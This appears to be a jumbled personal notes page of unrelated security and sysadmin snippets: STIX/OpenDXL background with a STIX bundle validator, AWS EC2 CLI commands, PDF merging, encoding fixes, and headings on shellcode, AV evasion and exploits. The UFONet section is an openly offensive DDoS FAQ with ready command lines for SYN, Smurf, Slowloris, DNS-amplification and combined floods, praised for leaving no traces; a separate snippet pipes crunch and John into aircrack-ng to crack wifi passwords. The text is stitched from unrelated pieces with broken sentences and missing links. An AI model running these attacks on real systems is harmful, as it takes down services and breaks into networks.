Open Data Exchange Layer (OpenDXL)

 The goal of the Open Data Exchange Layer (OpenDXL) is to enable security devices to share intelligence and orchestrate security operations in real time.

What is OpenDXL?

OpenDXL lets developers join an adaptive system of interconnected services that communicate and share information to make real-time, accurate security decisions. OpenDXL leverages the Data Exchange Layer (DXL), which many vendors and enterprises already utilize, and delivers a simple, open path for integrating security technologies regardless of vendor.

Designed to improve the context of analysis, shorten workflows of the threat defense lifecycle, reduce complexities across security products and vendors, and increase the value of previously deployed applications, OpenDXL enables unprecedented collaboration in an open, real-time system. By attaching to a common application framework, each participant enters into a unified ecosystem, one that gains value and capability as the network effect activates.

Structured Threat Information Expression (STIX)

It is becoming increasingly necessary for organizations to have a cyber threat intelligence capability and a key component of success for any such capability is information sharing with partners, peers and others they select to trust. While cyber threat intelligence and information sharing can help focus and prioritize the use of the immense volumes of complex cyber security information organizations face today, they have a foundational need for standardized, structured representations of this information to make it tractable. The Structured Threat Information eXpression (STIX™) is a quickly evolving, collaborative community-driven effort to define and develop a language to represent structured threat information. The STIX language is meant to convey the full range of cyber threat information and strives to be fully expressive, flexible, extensible, automatable, and as human-readable as possible. Though relatively new and still evolving, it is actively being adopted or considered for adoption by a wide range of cyber threat-related organizations and communities around the world. All interested parties are welcome to participate in evolving STIX as part of its open, collaborative community via the STIX web site, email discussion lists and other collaborative forums.

Structured Threat Information Expression (STIX™) is a structured language for describing cyber threat information so it can be shared, stored, and analyzed in a consistent manner.

The STIX whitepaper describes the motivation and architecture behind STIX. At a high level the STIX language consists of 9 key constructs and the relationships between them:
  • Observables describe what has been or might be seen in cyber
  • Indicators describe patterns for what might be seen and what they mean if they are
  • Incidents describe instances of specific adversary actions
  • Adversary Tactics, Techniques, and Procedures describe attack patterns, malware, exploits, kill chains, tools, infrastructure, victim targeting, and other methods used by the adversary
  • Exploit Targets describe vulnerabilities, weaknesses, or configurations that might be exploited
  • Courses of Action describe response actions that may be taken in response to an attack or as a preventative measure
  • Campaigns describe sets of incidents and/or TTPs with a shared intent
  • Threat Actors describe identification and/or characterization of the adversary
  • Reports collect related STIX content and give them shared context
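The constructs above are the STIX 1.x vocabulary; the current release named below is STIX 2.0, where content is exchanged as JSON objects inside a bundle. As an added example (not code from the STIX project or the OASIS bindings), the following standard-library Python builds a small STIX 2.0 bundle (an Indicator, a Malware object and the Relationship between them) and checks the structural rules that every consumer relies on: the common `type`/`id`/`created`/`modified` properties, `<type>--<uuid>` identifiers, type-specific required properties, and relationship references that resolve inside the bundle. The IP address, object names and labels are constructed sample values.

```python
import json
import re
import uuid
from datetime import datetime, timezone

# Added example, not from the STIX project: a minimal STIX 2.0 bundle builder and
# structural validator using only the standard library (no stix2 / python-stix).
SPEC_VERSION = "2.0"
REQUIRED_COMMON = ("type", "id", "created", "modified")
REQUIRED_BY_TYPE = {
    "indicator": ("labels", "pattern", "valid_from"),
    "malware": ("labels", "name"),
    "relationship": ("relationship_type", "source_ref", "target_ref"),
}
ID_RE = re.compile(r"^([a-z][a-z0-9-]+)--([0-9a-f-]{36})$")


def stix_timestamp(dt=None):
    """STIX 2.0 timestamps are UTC, RFC 3339, millisecond precision, 'Z' suffix."""
    dt = dt or datetime.now(timezone.utc)
    return dt.strftime("%Y-%m-%dT%H:%M:%S.%f")[:-3] + "Z"


def stix_id(obj_type):
    return f"{obj_type}--{uuid.uuid4()}"


def _base(obj_type, **props):
    ts = stix_timestamp()
    obj = {"type": obj_type, "id": stix_id(obj_type), "created": ts, "modified": ts}
    obj.update(props)
    return obj


def make_indicator(pattern, labels, name=None):
    obj = _base("indicator", labels=list(labels), pattern=pattern, valid_from=stix_timestamp())
    if name:
        obj["name"] = name
    return obj


def make_malware(name, labels):
    return _base("malware", name=name, labels=list(labels))


def make_relationship(source, target, relationship_type):
    return _base("relationship", relationship_type=relationship_type,
                 source_ref=source["id"], target_ref=target["id"])


def make_bundle(objects):
    return {"type": "bundle", "id": stix_id("bundle"), "spec_version": SPEC_VERSION,
            "objects": list(objects)}


def validate_bundle(bundle):
    """Return a list of problems; an empty list means the bundle is structurally sound."""
    errors = []
    if bundle.get("type") != "bundle" or bundle.get("spec_version") != SPEC_VERSION:
        errors.append("bundle: wrong type or spec_version")
    objects = bundle.get("objects", [])
    ids = {o.get("id") for o in objects}
    for obj in objects:
        label = obj.get("id", "<no id>")
        for prop in REQUIRED_COMMON + REQUIRED_BY_TYPE.get(obj.get("type"), ()):
            if prop not in obj:
                errors.append(f"{label}: missing required property '{prop}'")
        m = ID_RE.match(obj.get("id", ""))
        if not m or m.group(1) != obj.get("type"):
            errors.append(f"{label}: id must be '<type>--<uuid>' and match the type")
        else:
            try:
                uuid.UUID(m.group(2))
            except ValueError:
                errors.append(f"{label}: id suffix is not a UUID")
        if obj.get("type") == "relationship":
            for ref in ("source_ref", "target_ref"):
                if obj.get(ref) not in ids:
                    errors.append(f"{label}: {ref} {obj.get(ref)!r} is not in the bundle")
    return errors


def example_bundle():
    """Constructed sample: an indicator for a documentation-range IP tied to a malware object."""
    malware = make_malware("Example RAT (constructed)", ["remote-access-trojan"])
    indicator = make_indicator("[ipv4-addr:value = '198.51.100.23']", ["malicious-activity"],
                               name="C2 address seen in a sandbox run (constructed)")
    rel = make_relationship(indicator, malware, "indicates")
    return make_bundle([indicator, malware, rel])


if __name__ == "__main__":
    bundle = example_bundle()
    print(json.dumps(bundle, indent=2))
    print("problems:", validate_bundle(bundle))
```

Dangling references are the check worth keeping when content arrives from a TAXII feed: a Relationship whose `target_ref` is not in the bundle (and not already in your store) is silently useless to the analyst who receives it.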

How do I get it?

The current release is STIX Version 2.0, which is available on the STIX 2.0 website.
An archive of previous releases is hosted on this website.
Bindings and related tools to help process and work with STIX are open source on GitHub.

Where can I find examples of STIX data? Are there any STIX repositories?

The Samples page on this website hosts full threat reports expressed via STIX, including Mandiant’s APT1 report and FireEye’s Poison Ivy report. Idioms also provide good constrained examples.
In addition to the MITRE samples, community members have set up TAXII repositories containing STIX content and even directories pointing to those repositories. One example repository is

How do I use STIX? What tools/utilities are available for this effort?

The primary way to use STIX is of course via commercial products. See “Who is using STIX?” for more information.
If you’re developing a product or tool, the current STIX reference implementation is in XML so any XML libraries are suitable for producing and consuming STIX XML. The project also maintains open-source Python bindings and other Utilities to make working with STIX at the code level easier. Documentation and Suggested Practices, as well as Examples, can help you understand how to use the STIX Language conceptually (beyond just producing the XML).

Who is using STIX?

The OASIS Cyber Threat Intelligence (CTI) Technical Committee (TC) hosts “STIX/CybOX/TAXII Supporters” lists for both products and open source projects. You can add your product/project via their registration form.
In addition, the STIX Blog also notes vendor press releases and announcements.


TAXII (Trusted Automated eXchange of Indicator Information) is the main transport mechanism for cyber threat information represented in STIX. Through the use of TAXII services, organizations can share cyber threat information in a secure and automated manner.
The STIX and TAXII communities work closely together (and in fact consist of many of the same people) to ensure that they continue to provide a full stack for sharing threat intelligence.

ufonet: a toolkit for ddos simulations


DDoS test tool

What is UFONet?

It is a toolkit designed to launch DDoS and DoS attacks.

What is a DDoS attack?

A Distributed Denial of Service (DDoS) attack is an attempt to make an online service
unavailable by overwhelming it (for example, with traffic...) from multiple sources.

What is a DoS attack?

A Denial of Service (DoS) attack is an attempt to make an online service
unavailable by overwhelming it (for example, with traffic...) from a single source.

What is a Botnet?

A Botnet is a collection of computers often referred to as "zombies" that allows an attacker
to control them. It is commonly used to make DDoS attacks.

What is the philosophy behind UFONet?

"On a samurai sword or even any tool, what matters is who goes to use it and for what,
not who builds it and when..."

Why is UFONet more special than, for example, other botnets previously built?

Because UFONet tries not to leave traces (IPs, etc.) pointing to the origin of the attack. And
of course, because it is free/libre. ;-)

How does UFONet work technically?

UFONet is a tool designed to launch Layer 7 (HTTP/Web Abuse) DDoS attacks, using 'Open Redirect'
vectors, generally located on third-party web applications (a botnet), and other
powerful DoS attacks, some involving different OSI model layers, for example
the TCP/SYN flood attack, which is performed on Layer 3 (Network).

This schema shows you how the architecture of the requests is built when performing
a simple DDoS attack.

Is UFONet a "strong" botnet?

Well!. It depends on how you understand a botnet as "strong". If you understand it as;

 *  'privacy'; UFONet is the best -ninja- DDoS/DoS tool...
 *  'traffic volume'; it depends on; 'zombies', bandwidth, target's conf, etc...

With UFONet it's not about having a lot of 'zombies', it's more about whether those you have
work properly. If they are good, you can 'defeat' a 'small' webserver with just
a 'couple of dozen'.

Or, for example, in a scenario in which a target is using a VPS service with a limited
bandwidth quota (ex: 1GB/month), for the attacker it is just a matter of time to run the tool
and wait until the traffic (noise) reaches the maximum limit that closes the service.

Commonly people understand a botnet as an individual tool, but UFONet is also a P2P/darknet
that can be used to connect other machines and to run complex schemas involving other people
working cooperatively: sharing 'zombies', reporting statistics (with rankings, clans)...

Therefore, UFONet can also be defined, fundamentally, as a botnet of botnets, which is
obviously a harder-hitting and more effective way to overwhelm an objective than when a single person
tries it individually.

What's the difference between: 'zombies', 'aliens', 'droids', 'ucavs'...?

 * Zombie: HTTP GET 'Open Redirect' bot


 * Droid: HTTP GET 'Open Redirect' bot with params

 ex: https://ZOMBIE.COM/css-validator/validator?uri=$TARGET&profile=css3

 * Alien: HTTP POST 'Open Redirect' bot


 * Drone: HTTP 'Web Abuse' bot


 * X-RPC: XML-RPC Vulnerability

 ex: https://ZOMBIE.COM/xmlrpc.php

Is it possible to stress target's database using UFONet?

Yes, it is. For example, you can order your 'zombies' to submit random valid requests
to a target's search input form. This floods the database with queries.

 ex(wordpress): ./ufonet -a '' --db '?s='

Is there a LOIC connected to UFONet?

Yes, hehe... It has implemented an advanced version of that software that supports proxies.

 ex: ./ufonet -a '' --loic 500

And a LORIS?

Yes, of course. You can connect one to make requests that leave open threads on the target too,
making the web server work slower:

 ex: ./ufonet -a '' --loris 100

How does UFOSYN work?

It is a script to launch a powerful TCP-SYN (DoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --ufosyn 100


This script is used to launch a TCP-SYN reflector (DDoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --spray 100

What is a SMURF?

This other script is used to launch an ICMP echo (DDoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --smurf 100


With this script you can launch a complex TCP-XMAS (DoS) flood attack (it requires 'root' access):

 ex: sudo ./ufonet -a '' --xmas 100

How does a NUKE work?

With this script you can launch a TCP-STARVATION (DoS) socking attack (it requires 'root' access)
that will knock down your target in seconds, if it does not have a minimum level of protection:

 ex: sudo ./ufonet -a '' --nuke 10000


With this script you can perform a distributed amplification of DNS traffic:

 ex: sudo ./ufonet -a '' --tachyon 1000

How should a powerful attack that combines all the techniques (DDoS+DoS) look?

 sudo ./ufonet -a '' --loic 100 --loris 100 --ufosyn 100 \
      --spray 100 --smurf 100 --xmas 100 --nuke 10000 --tachyon 1000

How can I start with UFONet; for example using GNU/Linux (ex: Kali)?

You can try to install automatically all required libs by using this command (as root):

 % sudo python install

aws ec2 on linux command line


- An Amazon AWS account (free or paid account).
- An IAM user with an access key and secret access key.
- Pre-configured VPC, subnets, routes, internet gateways, security policy.
- Any Linux machine with the aws cli utility installed.

aws cli installation:


- Linux.
- Python 2.6.5 or higher.

[Tested on Linux Mint with the bash shell. Should work on Ubuntu as well.]

Update your system and its packages:

sudo apt update && sudo apt upgrade -y

Install Pip:

sudo apt install python-pip -y
sudo pip install --upgrade pip

Install the following modules:

sudo pip install setuptools
sudo pip install wheel

Install AWS CLI:

sudo pip install awscli

To verify that the installation went well, you can run the following command.

aws --version

If the output shows the aws version, then you are all set.

Enable AWS commands Auto completion:

- To enable auto completion of sub-commands, run the following to check where your "aws" and "aws_completer" binaries are located.

which aws
which aws_completer

- Copy the output of "which aws_completer". This is the path you will need.

Most used aws ec2 commands for shell scripts:

aws ec2 describe-instances

aws ec2 start-instances --instance-ids i-dddddd70

aws ec2 stop-instances --instance-ids i-5c8282ed

aws ec2 terminate-instances --dry-run --instance-ids i-dddddd70

aws ec2 create-tags --resources i-dddddd70 --tags Key=Department,Value=Finance

aws ec2 describe-volumes

aws ec2 attach-volume  --volume-id vol-1d5cc8cc --instance-id i-dddddd70 --device /dev/sdh

aws ec2 run-instances --dry-run --image-id ami-08111162 --count 1 --instance-type t1.micro --key-name MyKeyPair --security-groups my-ami-security-group

aws ec2 reboot-instances --instance-ids i-dddddd70

aws ec2 modify-instance-attribute --instance-id i-44a44ac3 --instance-type "{\"Value\": \"m1.small\"}"

aws ec2 create-image --instance-id i-44a44ac3 --name "Dev AMI" --description "AMI for development server"

aws ec2 describe-images --image-ids ami-2d574747

aws ec2 deregister-image --image-id ami-2d574747 && aws ec2 delete-snapshot --snapshot-id snap-4e665454

aws ec2 delete-snapshot --snapshot-id snap-4e665454

aws ec2 modify-instance-attribute --instance-id i-44a44ac3 --disable-api-termination

aws ec2 modify-instance-attribute --instance-id i-44a44ac3 --no-disable-api-termination

aws ec2 get-console-output --instance-id i-44a44ac3

aws ec2 monitor-instances --instance-ids i-44a44ac3

aws ec2 unmonitor-instances --instance-ids i-44a44ac3

aws ec2 describe-key-pairs

aws ec2 create-key-pair --key-name dev-servers

aws ec2 delete-key-pair --key-name dev-servers
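When these commands are used from scripts, the useful part is usually not the call itself but what you do with the JSON it returns. As an added example (not from the original post or from AWS), the following Python parses the JSON shape that `aws ec2 describe-instances` emits (`Reservations` → `Instances` → `InstanceId`, `State`, `Tags`), finds instances that lack a required tag such as the `Department` tag used above, and emits the corresponding `create-tags` and `--dry-run` `stop-instances` commands for review rather than executing them. The instance IDs and tags in `SAMPLE_DESCRIBE_INSTANCES` are constructed, and the `Department`/`Unassigned` policy is an assumption for the demonstration.

```python
import json
import sys

# Constructed sample of `aws ec2 describe-instances` JSON output (not real account data).
SAMPLE_DESCRIBE_INSTANCES = json.dumps({
    "Reservations": [
        {"Instances": [
            {"InstanceId": "i-0aaaaaaaaaaaaaaa1", "InstanceType": "t3.micro",
             "State": {"Name": "running"},
             "Tags": [{"Key": "Name", "Value": "web-1"},
                      {"Key": "Department", "Value": "Finance"}]},
            {"InstanceId": "i-0bbbbbbbbbbbbbbb2", "InstanceType": "m5.large",
             "State": {"Name": "running"},
             "Tags": [{"Key": "Name", "Value": "scratch"}]},
        ]},
        {"Instances": [
            # No "Tags" key at all: the CLI omits it for untagged instances.
            {"InstanceId": "i-0ccccccccccccccc3", "InstanceType": "t3.small",
             "State": {"Name": "stopped"}},
        ]},
    ]
})


def iter_instances(describe_json):
    """Flatten the Reservations/Instances nesting of describe-instances output."""
    data = json.loads(describe_json)
    for reservation in data.get("Reservations", []):
        for instance in reservation.get("Instances", []):
            yield instance


def tags_of(instance):
    """Turn the [{"Key":..., "Value":...}] list into a dict (missing Tags -> {})."""
    return {t["Key"]: t["Value"] for t in instance.get("Tags", [])}


def find_untagged(describe_json, required_tag="Department"):
    """Instance IDs that do not carry the required tag, in output order."""
    return [i["InstanceId"] for i in iter_instances(describe_json)
            if required_tag not in tags_of(i)]


def remediation_commands(describe_json, required_tag, default_value):
    """Build (but do not run) the CLI commands a reviewer would approve:
    tag every untagged instance, and dry-run a stop of the ones still running."""
    commands = []
    for inst in iter_instances(describe_json):
        if required_tag in tags_of(inst):
            continue
        iid = inst["InstanceId"]
        commands.append(
            f"aws ec2 create-tags --resources {iid} --tags Key={required_tag},Value={default_value}")
        if inst.get("State", {}).get("Name") == "running":
            # --dry-run checks permissions and arguments without stopping anything.
            commands.append(f"aws ec2 stop-instances --dry-run --instance-ids {iid}")
    return commands


if __name__ == "__main__":
    # Usage: aws ec2 describe-instances --output json | python3 ec2_tag_audit.py
    # (file name is an assumption); with no piped input the constructed sample is used.
    raw = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DESCRIBE_INSTANCES
    print("untagged:", find_untagged(raw))
    for cmd in remediation_commands(raw, "Department", "Unassigned"):
        print(cmd)
```

Note that the Python emits the commands as text; pasting them after review keeps a human between the inventory check and any state change, which is also why the stop command carries `--dry-run` just as the `terminate-instances` and `run-instances` lines above do.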

Merge multiple pdf files into a single pdf file

pdfunite - Portable Document Format (PDF) page merger

$ pdfunite 1.pdf 2.pdf 3.pdf 4.pdf 5.pdf 6.pdf 7.pdf application.pdf

If you're interested in learning how image search engines work, or trying to build one of your own, you should check it out.

pyenv installation


$ curl | bash redirects to the install script in this repository, and the invocation above is equivalent to:

$ curl -L | bash


Cracking wifi passwords with wordlists

Use crunch to create a wordlist "on-the-fly" (without wasting storage), pipe that to john with the --session option (so you can resume the cracking process), and give that to aircrack-ng (-w - means: read the wordlist from stdin, since crunch is creating it).

crunch 8 8 | john --stdin --session=superwifi --stdout | aircrack-ng -b 00:11:22:33:44:55 -w - handshake-Superwifi.cap


About John the Ripper session parameter usage:

You do not have to leave John running on a (pseudo-)terminal. If running John on a Unix-like system, you can simply disconnect from the server, close your xterm, etc. John will catch the SIGHUP ("hangup" signal) and continue running. Alternatively, you may prefer to start it in the background right away:
 john --wordlist=all.lst --rules mypasswd &
Obviously, the "&" is specific to Unix shells and will not work on most other platforms.
You may further enhance this by specifying a session name:
 john --session=allrules --wordlist=all.lst --rules mypasswd &
This ensures that you won't accidentally interfere with the instance of John running in the background if you proceed to start other sessions.
To view the status of a running session, use:
 john --status
for the default session or:
 john --status=allrules

Convert file encoding: Turkish character saving problem

Turkish character saving problem: check the current encoding, convert the file to UTF-8, then verify the result.

$ file -i input.file
$ cat input.file 
$ iconv -f ISO-8859-1 -t UTF-8//TRANSLIT input.file -o out.file
$ cat out.file 
$ file -i out.file 
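The `iconv` line above assumes the input is ISO-8859-1. That works for the letters Turkish shares with Western European languages (ç, ö, ü), but the Turkish-specific letters ğ, ı, ş, Ğ, İ, Ş live in ISO-8859-9 (Latin-5), which differs from ISO-8859-1 in exactly six byte positions; converting such a file "from ISO-8859-1" silently produces ð, ý, þ instead. The following Python is an added example (not from the original post) that makes the difference visible on a constructed byte string, converts with the right source encoding, and reproduces a `//TRANSLIT`-style ASCII fallback, handling the dotless ı that Unicode NFKD decomposition alone would drop. The `looks_like_latin5` heuristic is an assumption for Turkish-context files, not a general detector.

```python
import unicodedata

# Constructed sample: the name "Çağrı Şişli" encoded in ISO-8859-9 (Latin-5).
SAMPLE_LATIN5 = bytes([0xC7, 0x61, 0xF0, 0x72, 0xFD, 0x20,
                       0xDE, 0x69, 0xFE, 0x6C, 0x69])

# The only byte values where ISO-8859-9 and ISO-8859-1 disagree.
LATIN5_ONLY = {0xD0: "Ğ", 0xDD: "İ", 0xDE: "Ş", 0xF0: "ğ", 0xFD: "ı", 0xFE: "ş"}

# NFKD has no decomposition for dotless ı, so map it (and its capital) explicitly.
_TRANSLIT_FIXUPS = str.maketrans({"ı": "i", "İ": "I"})


def decode_as(data: bytes, encoding: str) -> str:
    """Interpret raw bytes under a given legacy encoding (like `iconv -f`)."""
    return data.decode(encoding)


def looks_like_latin5(data: bytes) -> bool:
    """Heuristic (assumption): in a Turkish-language context, any of the six
    Latin-5-only byte values almost always means ISO-8859-9, not ISO-8859-1."""
    return any(b in LATIN5_ONLY for b in data)


def to_utf8(data: bytes, source: str = None) -> bytes:
    """Equivalent of `iconv -f <source> -t UTF-8`; guesses Latin-5 vs Latin-1 if unspecified."""
    if source is None:
        source = "iso-8859-9" if looks_like_latin5(data) else "iso-8859-1"
    return decode_as(data, source).encode("utf-8")


def translit_ascii(text: str) -> str:
    """ASCII fallback similar to iconv's //TRANSLIT: strip combining marks after NFKD,
    after first rewriting the letters that have no decomposition."""
    text = text.translate(_TRANSLIT_FIXUPS)
    decomposed = unicodedata.normalize("NFKD", text)
    return decomposed.encode("ascii", "ignore").decode("ascii")


def convert_file(src_path: str, dst_path: str, source: str = None) -> str:
    """Read a legacy-encoded file, write it as UTF-8, return the encoding that was used."""
    with open(src_path, "rb") as fh:
        data = fh.read()
    used = source or ("iso-8859-9" if looks_like_latin5(data) else "iso-8859-1")
    with open(dst_path, "wb") as fh:
        fh.write(to_utf8(data, used))
    return used


if __name__ == "__main__":
    print("as ISO-8859-1:", decode_as(SAMPLE_LATIN5, "iso-8859-1"))   # wrong letters
    print("as ISO-8859-9:", decode_as(SAMPLE_LATIN5, "iso-8859-9"))   # Çağrı Şişli
    print("UTF-8 bytes:  ", to_utf8(SAMPLE_LATIN5))
    print("translit:     ", translit_ascii(decode_as(SAMPLE_LATIN5, "iso-8859-9")))
```

Run `file -i` first as the post does; if it reports `iso-8859-1` on a Turkish file, that is `file` guessing from byte ranges, and `iconv -f ISO-8859-9` is the conversion to try before accepting ð/ý/þ in the output.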

Utility Functions for Resilient: installation problem

Resilient Functions simplify development of integrations by wrapping each external activity into an individual workflow component. These components can be easily installed, then used and combined in Resilient workflows. The Resilient platform sends data to the function component that performs an activity then returns the results to the workflow. The results can be acted upon by scripts, rules, and workflow decision points to dynamically orchestrate the security incident response activities.

The Utility Functions integration package contains several useful workflow functions for common automation and integration activities in Resilient. These include:

    - a function to call generic REST/JSON web service APIs,
    - a function to run arbitrary shell scripts (bash and PowerShell),
    - functions to fetch SSL certificates from a server and parse them,
    - functions to work with Excel, HTML, XML, JSON and EML files,
    - functions to work with Resilient attachments: calculate hashes, list and extract ZIP archives, convert to and from base64,
    - and more.


[root@resilient ~]# pip install
Processing ./
    Complete output from command python egg_info:
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
    IOError: [Errno 2] No such file or directory: '/tmp/pip-req-build-k_Apec/'
Command "python egg_info" failed with error code 1 in /tmp/pip-req-build-k_Apec/


[root@resilient ~]# unzip
  inflating: fn_utilities-1.0.6.tar.gz 

[root@resilient ~]# pip install fn_utilities-1.0.6.tar.gz

Antivirus Evasion Tools

ollydbg quickstart guide

phrack: History and Advances in Windows Shellcode


Firewalls are everywhere on the Internet now. Most of the exploits released to the public have little concern for firewall rules because they are just proofs of concept. In the real world, we encounter targets behind firewalls that make exploitation harder. We need to overcome these obstacles for a successful penetration testing job. The research for this paper started when we needed to take over (own) a machine which was heavily protected with rigid firewall rules. Although we could reach the vulnerable service, the strong firewall rules between us and the server rendered all standard exploits useless.

The objective of the research is to find alternative ways which allow a penetration tester to take control of a machine after a successful buffer overflow, "successful" in the sense that it eventually leads to arbitrary code execution. These alternative mechanisms should succeed where others fail, even under the most rigid firewall rules.

In our research to find a way to bypass these troublesome firewall rules, we looked into various existing techniques used by public exploits and why they fail. Then we found several mechanisms that will work, but which depend on the vulnerable service. Although we can take over the server using these techniques, we take one step further to develop a more generic technique which is not dependent on any service and can be reused in most other buffer overflows.

This paper will start with a dissection of a standard Win32 shellcode as an introduction. We will then explore the techniques used by proof-of-concept code to allow the attacker to control the target, and their limitations. Then we will introduce a few alternative techniques which we call "One-way shellcode" and how they may bypass firewall rules. Finally, we also discuss a possible way to transfer a file from the command line without breaking the firewall rules.

SEH - Structured Exception Handler EXPLOITATION



References: (Watch it)

Libssh Authentication Bypass Vulnerability Exploit (CVE-2018-10933)


Docker image:

Pico CTF 2018 Web Exploitation Writeup

running kali docker image on linode

$ docker pull kalilinux/kali-linux-docker
$ docker run -t -i kalilinux/kali-linux-docker /bin/bash
# apt-get update && apt-get install metasploit-framework

Control DNS responses
ApateDNS™ is a tool for controlling DNS responses through an easy-to-use GUI. Acting as a phony DNS server, ApateDNS spoofs DNS responses to a user-specified IP address by listening on UDP port 53 on the local machine. ApateDNS also automatically sets the local DNS to localhost. Upon exiting the tool, it restores the original local DNS settings.


Regshot is an open-source (LGPL) registry compare utility that allows you to quickly take a snapshot of your registry and then compare it with a second one taken after making system changes or installing a new software product.